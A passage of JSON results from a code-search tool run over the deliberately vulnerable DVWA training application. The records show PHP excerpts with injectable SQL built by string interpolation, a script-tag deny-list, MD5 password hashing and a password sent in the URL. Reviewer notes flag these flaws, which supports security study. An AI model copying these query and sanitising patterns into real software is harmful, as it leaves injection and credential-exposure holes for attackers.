  "match": "<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize name input\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;script>'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span 
class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"highlight\"><span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"INSERT INTO guestbook <span class=\"token punctuation\">(</span> comment<span class=\"token punctuation\">,</span> name <span class=\"token punctuation\">)</span> VALUES <span class=\"token punctuation\">(</span> <span class=\"token string\">'$message'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'$name'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token 
variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token 
punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token function\">mysql_close</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> }",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
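  "note": "The search hit is the comment on line 17. The str_replace on line 14 removes one exact, case-sensitive literal (an opening script tag); that is a deny-list, not output encoding, so confirm the stored fields are HTML-encoded (htmlspecialchars or equivalent) wherever the guestbook is rendered. The INSERT on line 18 is built by string interpolation with $name escaped on line 15; handling of $message is outside the excerpt. Prefer a prepared statement with bound parameters. Line 19 also prints the raw database error to the page on failure."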
 },
 {
  "id": 48,
  "file": "/home/chris/src/DVWA-master/login.php",
  "filetype": "php",
  "search": "`",
  "match": "<span class=\"line-number\">28:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">mysqli_num_rows</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span> !<span class=\"token operator\">=</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">29:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"First time using DVWA.&lt;br />Need to run 'setup.php'.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">30:</span> \t\t<span class=\"token function\">dvwaRedirect</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">31:</span> \t}\n<span class=\"line-number\">32:</span> \n<span class=\"highlight\"><span class=\"line-number\">33:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user<span class=\"token operator\">=</span><span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password<span class=\"token operator\">=</span><span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">34:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> @<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span 
class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span 
class=\"token punctuation\">.</span> <span class=\"token string\">'.&lt;br />Try &lt;a href=\"setup.php\">installing again&lt;/a>.&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">35:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">mysqli_num_rows</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {    <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Login Successful<span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span>\n<span class=\"line-number\">36:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"You have logged in as '{$user}'\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">37:</span> \t\t<span class=\"token function\">dvwaLogin</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">38:</span> \t\t<span class=\"token function\">dvwaRedirect</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 33,
  "start": 28,
  "end": 39,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 68,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
  "filetype": "php",
  "search": "`",
  "match": "<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token 
punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"highlight\"><span class=\"line-number\">19:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span 
class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">mysqli_num_rows</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get users details\n<span class=\"line-number\">24:</span> \t\t<span class=\"token variable\">$row</span>    <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_fetch_assoc</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 19,
  "start": 14,
  "end": 25,
  "severity": "unknown",
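  "note": "The matched backtick is MySQL identifier quoting around the table name inside a PHP string, not the PHP shell-execution operator. The highlighted line does build the login query by interpolating $user and $pass into the SQL text; $pass is escaped and MD5-hashed on lines 15-16, while the handling of $user is outside this excerpt and should be checked. A prepared statement with bound parameters removes the reliance on escaping, and MD5 is not a suitable password hash."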
 },
 {
  "id": 80,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/low.php",
  "filetype": "php",
  "search": "`",
  "match": "<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get password\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span 
class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">mysqli_num_rows</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">16:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get users details\n<span class=\"line-number\">17:</span> \t\t<span class=\"token variable\">$row</span>    <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_fetch_assoc</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
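  "note": "Backtick match is SQL identifier quoting, not command execution. The password is read from $_GET['password'] (line 8), so it travels in the URL and can end up in server logs and browser history, and it is only MD5-hashed before being interpolated into the query on line 12. Where $user comes from is not visible in this excerpt; confirm whether it is escaped, and prefer a prepared statement with bound parameters."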
 },
 {
  "id": 85,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/medium.php",
  "filetype": "php",
  "search": "`",
  "match": "<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token 
punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span 
class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> 
<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">mysqli_num_rows</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get users details\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$row</span>    <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_fetch_assoc</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 99,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
  "filetype": "php",
  "search": "`",
  "match": "<span class=\"line-number\">26:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">27:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token 
